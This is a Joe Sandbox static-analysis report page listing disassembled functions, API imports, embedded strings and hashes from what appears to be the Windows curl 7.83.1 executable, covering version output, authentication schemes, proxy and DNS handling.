_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,000000013F492979), ref: 000000013F4925DA

Part of subcall function 000000013F483E4C: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F483E89

Strings

bad range, xrefs: 000000013F492431
range overflow, xrefs: 000000013F4924A2, 000000013F492692
%c-%c%c, xrefs: 000000013F49238F
bad range specification, xrefs: 000000013F4926AF

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _errno$strtoul$__stdio_common_vsscanf
String ID: %c-%c%c$bad range$bad range specification$range overflow
API String ID: 3842623485-566611384
Opcode ID: 6b9b44a0b3eab79b6cbb08dd0d0fc17d2b6d791b45ac79dfc8682ee1c2e2b9ca
Instruction ID: e9d9ebe7cd6b8775a3309e4aa5549736581fc2bb46639891e16eb17497f1533a
Opcode Fuzzy Hash: 6b9b44a0b3eab79b6cbb08dd0d0fc17d2b6d791b45ac79dfc8682ee1c2e2b9ca
Instruction Fuzzy Hash: 3BC19C32B01A948AFBA4CF2599543EF3BA1F345B88F95803DDA5A43795DB39CB46C700

Function 000000013F48F650 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 219stringCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,000000013F48A5FA), ref: 000000013F48F67F
setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00000000,000000013F48A5FA), ref: 000000013F48F694
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,000000013F48A5FA), ref: 000000013F48F6B4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,000000013F48A5FA), ref: 000000013F48F705
puts.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,000000013F48A5FA), ref: 000000013F48F78F
puts.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,000000013F48A5FA), ref: 000000013F48F7CA

Part of subcall function 000000013F490444: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,000000013F48F917), ref: 000000013F490546

Strings

--disable, xrefs: 000000013F48F6BE
out of memory, xrefs: 000000013F48F83A
%s, xrefs: 000000013F48F7A2
Build-time engines:, xrefs: 000000013F48F788
hnd = curl_easy_init();, xrefs: 000000013F48F825
<none>, xrefs: 000000013F48F7C3
curl_easy_cleanup(hnd);, xrefs: 000000013F48F955, 000000013F48F98A
hnd = NULL;, xrefs: 000000013F48F968, 000000013F48F99D

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _strdupputs$freesetlocalestrncmp
String ID: %s$ <none>$--disable$Build-time engines:$curl_easy_cleanup(hnd);$hnd = NULL;$hnd = curl_easy_init();$out of memory
API String ID: 1782117485-3702358654
Opcode ID: ebcf773e13911affead49d169eaf03a6635d7cb59ee7551b26c8d61b44cbba44
Instruction ID: db8b9b39077407161b693093bcdaba79f78c234e8caa0877eb4c8420612cd346
Opcode Fuzzy Hash: ebcf773e13911affead49d169eaf03a6635d7cb59ee7551b26c8d61b44cbba44
Instruction Fuzzy Hash: DB916A35A05B4095FB24EF25E8513EB67A1A784BA0F944439DD4A87796EF39CB47C300

Function 000000013F4933F4 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,000000A0,?,?,00000000,000000013F48B11E,?,?,?,?,?,?,?,?,?,00000000), ref: 000000013F49341F
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F48F5B7,?,00000001,?,00000000), ref: 000000013F493646

Strings

header{, xrefs: 000000013F4935B3
curl: unknown --write-out variable: '%s', xrefs: 000000013F4934E8
%header{, xrefs: 000000013F4935E4

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __acrt_iob_funcfputc
String ID: %header{$curl: unknown --write-out variable: '%s'$header{
API String ID: 2340846889-221383536
Opcode ID: b0e45c8dc1d24070f79ced673b3a2ca840005b79d79d4961e845b5299c2d69f8
Instruction ID: 33b6d81b99c440589b227937c4e226b0a76870c945c1db4b440469917739ec81
Opcode Fuzzy Hash: b0e45c8dc1d24070f79ced673b3a2ca840005b79d79d4961e845b5299c2d69f8
Instruction Fuzzy Hash: AB71A231F0868081FB658F15A9647FB7BAAE756BC4F89403DDA5A473D5EA2CCA47C300

Function 000000013F4B7914 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 121COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F4B7A5D

Strings

Basic, xrefs: 000000013F4B79DF
Bearer, xrefs: 000000013F4B7A3B
Server, xrefs: 000000013F4B7AC4
NTLM, xrefs: 000000013F4B7985
Negotiate, xrefs: 000000013F4B796F
Proxy, xrefs: 000000013F4B7AD9
%s auth using %s with user '%s', xrefs: 000000013F4B7ACE
Authorization: Bearer %s, xrefs: 000000013F4B7A56
Authorization, xrefs: 000000013F4B7A20, 000000013F4B7A8B
AWS_SIGV4, xrefs: 000000013F4B794E
Digest, xrefs: 000000013F4B799D
Proxy-authorization, xrefs: 000000013F4B79CB

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _scwprintf
String ID: %s auth using %s with user '%s'$AWS_SIGV4$Authorization$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-authorization$Server
API String ID: 1992661772-237531397
Opcode ID: 4488098f46b09f30fcb668fade2f7909394647ef9a85e17a79884b628fcabadf
Instruction ID: 4e4246f742fae8594cc1cf466d66948c558df2cf703648a4d90cbf4b724eb54e
Opcode Fuzzy Hash: 4488098f46b09f30fcb668fade2f7909394647ef9a85e17a79884b628fcabadf
Instruction Fuzzy Hash: 69515B32A0478A95FF649B2596403EB3B90F759784F44403EDA8D87797EB39CB5B8310

Function 000000013F489E74 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F4950D8: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000050,000000013F489CBC), ref: 000000013F4950F9

puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F489F03
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 000000013F489F6A
puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F489F9A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F489FB2

Strings

curl 7.83.1 (Windows) %s, xrefs: 000000013F489E9B
2022-05-13, xrefs: 000000013F489EA7
%s , xrefs: 000000013F489EE4
WARNING: curl and libcurl versions do not match. Functionality may be affected., xrefs: 000000013F489FBB
Protocols: , xrefs: 000000013F489EC8
7.83.1, xrefs: 000000013F489FAB
Features:, xrefs: 000000013F489F1C
Release-Date: %s, xrefs: 000000013F489EAE
%s, xrefs: 000000013F489F7E

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: puts$__acrt_iob_funcqsortstrcmp
String ID: %s$%s $2022-05-13$7.83.1$Features:$Protocols: $Release-Date: %s$WARNING: curl and libcurl versions do not match. Functionality may be affected.$curl 7.83.1 (Windows) %s
API String ID: 2220958200-3826092985
Opcode ID: 41133b786f8199fb09a4f6f87421efb745891282f17b25aace062c49a5d03537
Instruction ID: 1c5507b12f6d9347e2cd7ecf344dba9491668cf2c6d548bf52c742802225c057
Opcode Fuzzy Hash: 41133b786f8199fb09a4f6f87421efb745891282f17b25aace062c49a5d03537
Instruction Fuzzy Hash: 24412971B04A4491EB11DF25E8453EBA3A1FB54B84F94453EDA4D436AAEB39CB4BC700

Function 000000013F482350 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F4820D0: _scwprintf.LIBCMT ref: 000000013F482130

_get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F482417
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F482424
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 000000013F482440
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 000000013F48246C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48247B
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 000000013F4824A7
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 000000013F4824C9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4824D6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4824E4
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F4824FE
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F48253D

Strings

Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file., xrefs: 000000013F4823EE

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ByteCharConsoleMultiWidefree$BufferInfoScreenWrite_fileno_get_osfhandle_scwprintffflushfwritemalloc
String ID: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file.
API String ID: 662453125-3734715646
Opcode ID: 825750e178d52abaa70d249529622de493b9645fa82493731f53fbd41dc260e0
Instruction ID: ad618b26938068cbebaf284f2ac2dd17ef9d57456add534ef17ed685156ddf50
Opcode Fuzzy Hash: 825750e178d52abaa70d249529622de493b9645fa82493731f53fbd41dc260e0
Instruction Fuzzy Hash: 14515E72A15B8486FB549B22E8147AB6BA0F785BD8F440439EE4A47796DF3DC683C310

Function 000000013F4B13C8 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 301COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F4B17AD

Strings

Malformatted trailing header, skipping trailer, xrefs: 000000013F4B152A
operation aborted by trailing headers callback, xrefs: 000000013F4B15E5
Successfully compiled trailers., xrefs: 000000013F4B1566
read function returned funny value, xrefs: 000000013F4B1739
Signaling end of chunked upload via terminating chunk., xrefs: 000000013F4B1809
Read callback asked for PAUSE when not supported, xrefs: 000000013F4B16F4
Signaling end of chunked upload after trailers., xrefs: 000000013F4B18B5
operation aborted by callback, xrefs: 000000013F4B16C1
%zx%s, xrefs: 000000013F4B1786
Moving trailers state machine from initialized to sending., xrefs: 000000013F4B1413

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __swprintf_l
String ID: %zx%s$Malformatted trailing header, skipping trailer$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
API String ID: 1488884202-2453975552
Opcode ID: 5fb2684a9bea3a436fc15b99a4ea7facf2869658ddb6248bc3fce7fd0c88f7ba
Instruction ID: 6cf3ff3d1bf9a3e45765c3858ed583f870538c71a7581919366ea8ff341b31e8
Opcode Fuzzy Hash: 5fb2684a9bea3a436fc15b99a4ea7facf2869658ddb6248bc3fce7fd0c88f7ba
Instruction Fuzzy Hash: FEE1B032B05B8896FB59CB21D5443EB77A0F785B90F484139EB9A07396DF38DA66C301

Function 000000013F4A9260 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 300COMMON

Download Yara Rule

Strings

socks4a, xrefs: 000000013F4A935A
socks5, xrefs: 000000013F4A9340
Unsupported proxy scheme for '%s', xrefs: 000000013F4A93AD
https, xrefs: 000000013F4A9306
socks5h, xrefs: 000000013F4A9323
Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support., xrefs: 000000013F4A93E0
http, xrefs: 000000013F4A939A
socks4, xrefs: 000000013F4A9374
Unsupported proxy syntax in '%s', xrefs: 000000013F4A9671
socks, xrefs: 000000013F4A9387

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID:
String ID: Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$Unsupported proxy syntax in '%s'$http$https$socks$socks4$socks4a$socks5$socks5h
API String ID: 0-874090715
Opcode ID: eb0975095b33097f1b693aa07614678dad25c1bf6672c8bb6ef7bfb6f2bc264c
Instruction ID: cd82d611a446046319c25d71c9dc912b0736fade0814f70124bb48d5498be269
Opcode Fuzzy Hash: eb0975095b33097f1b693aa07614678dad25c1bf6672c8bb6ef7bfb6f2bc264c
Instruction Fuzzy Hash: C0D14736F04B4486FF149B26E8447EB27A0BB88BA4F451539DE1D577D6EB38CA4AC340

Function 000000013F4B5C30 Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F4B514C: tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4B518E

strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F4B5DB4
inet_pton.WS2_32 ref: 000000013F4B5E78
inet_pton.WS2_32 ref: 000000013F4B5E9A

Strings

Added %s:%d:%s to DNS cache%s, xrefs: 000000013F4B5FE5
RESOLVE %s:%d is - old addresses discarded, xrefs: 000000013F4B5F53
RESOLVE %s:%d is wildcard, enabling wildcard checks, xrefs: 000000013F4B6013
Resolve address '%s' found illegal, xrefs: 000000013F4B603A
Couldn't parse CURLOPT_RESOLVE entry '%s', xrefs: 000000013F4B6049
%255[^:]:%d, xrefs: 000000013F4B5CB0
Couldn't parse CURLOPT_RESOLVE removal entry '%s', xrefs: 000000013F4B5CC4
(non-permanent), xrefs: 000000013F4B5FD6

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: inet_pton$strtoultolower
String ID: (non-permanent)$%255[^:]:%d$Added %s:%d:%s to DNS cache%s$Couldn't parse CURLOPT_RESOLVE entry '%s'$Couldn't parse CURLOPT_RESOLVE removal entry '%s'$RESOLVE %s:%d is - old addresses discarded$RESOLVE %s:%d is wildcard, enabling wildcard checks$Resolve address '%s' found illegal
API String ID: 302596564-3811207075
Opcode ID: 6254b0986a885a797b90499b5a55a3b5628591d9766981833ccc0e9d5289b4ee
Instruction ID: d6847785eae36079fdb0d3c61f2e85ca68d5ab3696900e95d50d447316f763e3
Opcode Fuzzy Hash: 6254b0986a885a797b90499b5a55a3b5628591d9766981833ccc0e9d5289b4ee
Instruction Fuzzy Hash: 46C1B031B0578995FF20DB22E5443EB6761F785B98F44113AEA8A077CAEB38CA47C340

Function 000000013F4A3BA4 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 223networkCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F4A315C: htons.WS2_32 ref: 000000013F4A31A6

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F4A3C24
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F4A3C2C

Part of subcall function 000000013F49E9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49E9E3
Part of subcall function 000000013F49E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49E9EB
Part of subcall function 000000013F49E9C8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49E9FB
Part of subcall function 000000013F49E9C8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49EA05
Part of subcall function 000000013F49E9C8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49EA18
Part of subcall function 000000013F49E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49EAA8
Part of subcall function 000000013F49E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49EAB3
Part of subcall function 000000013F49E9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49EABC
Part of subcall function 000000013F49E9C8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49EAC8

Part of subcall function 000000013F4A4190: closesocket.WS2_32 ref: 000000013F4A41D8

setsockopt.WS2_32 ref: 000000013F4A3CB3
WSAGetLastError.WS2_32 ref: 000000013F4A3CBD

Strings

sa_addr inet_ntop() failed with errno %d: %s, xrefs: 000000013F4A3C43
Immediate connect fail for %s: %s, xrefs: 000000013F4A3EB2
Could not set TCP_NODELAY: %s, xrefs: 000000013F4A3CD4
Trying %s:%d..., xrefs: 000000013F4A3C63

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _errno$ErrorLast$__sys_errlist__sys_nerrclosesockethtonssetsockoptstrncpy
String ID: Trying %s:%d...$Could not set TCP_NODELAY: %s$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 3201143625-1915463321
Opcode ID: 8760f28a52d8ca9847d57e6e5c7e9b09f571983ff254badd81ce2595904c8d4d
Instruction ID: 2c83266419355bde67eb9b276f9e4e5144c22837f9ff9415d3bc8227d78053a9
Opcode Fuzzy Hash: 8760f28a52d8ca9847d57e6e5c7e9b09f571983ff254badd81ce2595904c8d4d
Instruction Fuzzy Hash: 5E91A172B0068585FF619B66A4447EF6394F745BC8F80443EEE5A07796FE3ACB4A8700

Function 000000013F48306C Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 201stringCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4830D8
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4830FA
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F48314E
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F483276

Strings

NUL, xrefs: 000000013F4831C0
COM, xrefs: 000000013F4831F4
PRN, xrefs: 000000013F483190
CLOCK$, xrefs: 000000013F4831DA
LPT, xrefs: 000000013F48320A
AUX, xrefs: 000000013F4831AA
CON, xrefs: 000000013F483176

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: strncpy$_strdupmalloc
String ID: AUX$CLOCK$$COM$CON$LPT$NUL$PRN
API String ID: 3833483438-925842913
Opcode ID: b22c1ea8c8d85b2d979fa00ff533a6ffd0fc63cbb9176499a27d6c5cb2fb0f65
Instruction ID: c29e76c2845594b088f8780f9bce09cecfb4bc9bf7c2e0e53572b8f69d60026b
Opcode Fuzzy Hash: b22c1ea8c8d85b2d979fa00ff533a6ffd0fc63cbb9176499a27d6c5cb2fb0f65
Instruction Fuzzy Hash: 8781AB31A04B8054FB61AB25E9103FB6A90A7A5BD4F484639DE5E477D6FB2ECB47C300

Function 000000013F491E80 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 171COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F491F37
__swprintf_l.LIBCMT ref: 000000013F491FDD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,000000013F48F1CE,?,?,?,?,?,00000000,00000000,000000013F48F585,?,00000001,?,00000000,00000000), ref: 000000013F4920BD

Strings

curl_easy_setopt(hnd, %s, %s);, xrefs: 000000013F49209F
curl_easy_setopt(hnd, %s, "%s");, xrefs: 000000013F49208F
objectpointer, xrefs: 000000013F491FA3
(curl_off_t)%I64d, xrefs: 000000013F491FCC
functionpointer, xrefs: 000000013F491F72
%s set to a %s, xrefs: 000000013F492045
%ldL, xrefs: 000000013F491F26
blobpointer, xrefs: 000000013F492007

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __swprintf_l$free
String ID: %ldL$%s set to a %s$(curl_off_t)%I64d$blobpointer$curl_easy_setopt(hnd, %s, "%s");$curl_easy_setopt(hnd, %s, %s);$functionpointer$objectpointer
API String ID: 1144208884-2831394677
Opcode ID: 0df8022c24536910f2c23727c5bca70af129cce54a723775b81e263de2d2913a
Instruction ID: 50de4ba9360cae07fbbd43b8511c261152bd1d9734ff12403ace95594b802998
Opcode Fuzzy Hash: 0df8022c24536910f2c23727c5bca70af129cce54a723775b81e263de2d2913a
Instruction Fuzzy Hash: 9561EF32B18A4985FF608B21E4507EB63A1B794B94F545539DE4D07B99EB38CB47C300

Function 000000013F4A5F5C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 156COMMON

Download Yara Rule

APIs

Part of subcall function 000000013F4A4908: _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,000000013F49DE4D,?,00000000,00000000,?), ref: 000000013F4A4925

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4A6956,?,?,00000000,000000013F48B1A6), ref: 000000013F4A5FB4
_scwprintf.LIBCMT ref: 000000013F4A5FF2
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4A6956,?,?,00000000,000000013F48B1A6), ref: 000000013F4A602D
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4A6956,?,?,00000000,000000013F48B1A6), ref: 000000013F4A60A5
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4A6956,?,?,00000000,000000013F48B1A6), ref: 000000013F4A6108
